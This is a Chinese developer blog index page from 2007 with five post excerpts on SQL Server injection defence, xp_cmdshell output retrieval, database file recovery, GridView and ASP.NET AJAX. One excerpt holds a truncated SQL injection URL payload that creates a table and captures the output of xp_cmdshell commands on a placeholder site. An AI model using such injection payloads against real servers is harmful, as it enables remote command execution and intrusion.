- 博客(5)
- 收藏
- 关注
RSS订阅转载 Sql Server 注入防止办法
一般的黑客攻击SQL Server时,首先采用的方法是执行master扩展存储过程xp_cmdshell命令来破坏数据库,为了数据库安全起见,最好禁止使用xp_cmdShellxp_cmdshell可以让系统管理员以操作系统命令行解释器的方式执行给定的命令字符串, 并以文本行方式返回任何输出,是一个功能非常强大的扩展存贮过程。 一般情况下,xp_cmdshell对管理员来说也是不必要
2007-06-04 15:37:00
494
转载 xp_cmdshell 执行回显问题
创建表,加了个自动编号的ID,并把xp_cmdshell的回显内容导入临时表http://www.xxx.com/aa.asp?=1 ;drop TABLE D99_CMD; create TABLE D99_CMD([Data][varchar](1000),ID int NOT NULL IDENTITY (1,1));insert D99_CMD exec master.dbo.xp_cmd
2007-06-04 10:05:00
984
原创 只有mdf文件而没有ldf文件修复方法
只有mdf文件而没有ldf文件修复log文件或者重新生成一个log文件的方法 只有mdf文件的恢复技术 由于种种原因,我们如果当时仅仅备份了mdf文件,那么恢复起来就是一件很麻烦的事情了。 如果您的mdf文件是当前数据库产生的,那么很侥幸,也许你使用sp_attach_db或者sp_attach_single_file_db可以恢复数据库,但
2007-06-04 10:02:00
1534
转载 GridView 用法
GridView无代码分页排序GridView选中,编辑,取消,删除GridView正反双向排序GridView和下拉菜单DropDownList结合GridView和CheckBox结合鼠标移到GridView某一行时改变该行的背景色方法一鼠标移到GridView某一行时改变该行的背景色方法二GridView实现删除时弹出确认对话框GridView实现自动编号GridView实现自定义时间货币等
2007-05-30 17:44:00
315
转载 不安装ASPAJAXExtSetup.msi开发和发布ajax网站
问题来源:atlas更名为asp.net ajax前,安装了开发包就可以在网站的BIN目录下生成相应的atlas的dll文件,这样发布时连同所有的dll组件都会发布出去,但是目前ajax准备在vs2007集成到工具箱中,所以现在在vs2005上安装rc版的ajax时,其控件的命名空间已经变为:System.Web.Extensions,在发布网站的时候在bin目录中也不会产生任何的DLL组件。由此
2007-05-28 14:11:00
543
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人